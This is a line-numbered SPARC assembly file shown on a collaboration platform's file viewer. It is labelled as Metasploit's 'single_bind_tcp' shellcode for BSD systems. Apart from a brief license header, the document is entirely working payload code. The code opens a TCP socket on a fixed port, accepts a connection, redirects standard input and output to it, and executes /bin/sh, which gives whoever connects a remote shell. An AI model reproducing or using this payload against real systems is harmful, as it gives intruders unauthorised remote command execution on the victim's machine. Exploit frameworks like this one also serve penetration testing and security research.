Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
#
3
#        Name: single_bind_tcp
4
#   Platforms: *BSD
5
#     Authors: vlad902 <vlad902 [at] gmail.com>
6
#     Version: $Revision: 1652 $
7
#     License:
8
#
9
#        This file is part of the Metasploit Exploit Framework
10
#        and is subject to the same licenses and copyrights as
11
#        the rest of this package.
12
#
13
# Description:
14
#
15
#        Single bind TCP shell.
16
#
17
##
18

19
.globl main
20

21
main:
22
	andn	%sp, 7, %sp
23

24
	xor	%o3, %o3, %o2
25
	mov	0x01, %o1
26
	mov	0x02, %o0
27
	mov	0x61, %g1
28
	ta	0x08
29

30
	st	%o0, [ %sp - 0x08 ]
31

32
	set	0xff027a68, %l0
33
	st	%l0, [ %sp - 0x10 ]
34
	st	%g0, [ %sp - 0x0c ]
35
	sub	%sp, 16, %o1
36
	mov	0x10, %o2
37
	mov	0x68, %g1
38
	ta	0x08
39

40
	ld	[ %sp - 0x08 ], %o0
41
	mov	0x01, %o1
42
	mov	0x6a, %g1
43
	ta	0x08
44

45
	ld	[ %sp - 0x08 ], %o0
46
	xor	%o1, %o1, %o1
47
	or	%o1, %o1, %o2
48
	mov	0x1e, %g1
49
	ta	0x08
50

51
	st	%o0, [ %sp - 0x08 ]
52
	mov	3, %o1
53
dup2_loop:
54
	subcc	%o1, 1, %o1
55
	mov	0x5a, %g1
56
	ta	0x08
57

58
	bnz	dup2_loop
59
	ld	[ %sp - 0x08 ], %o0
60

61
	xor	%o3, %o3, %o2
62
	set	0x2f62696e, %l0
63
	set	0x2f736800, %l1
64
	sub	%sp, 0x10, %o0
65
	sub	%sp, 0x08, %o1
66
	std	%l0, [ %sp - 0x10 ]	
67
	st	%o0, [ %sp - 0x08 ]
68
	st	%g0, [ %sp - 0x04 ]
69
	mov	0x3b, %g1
70
	ta	0x08
71

72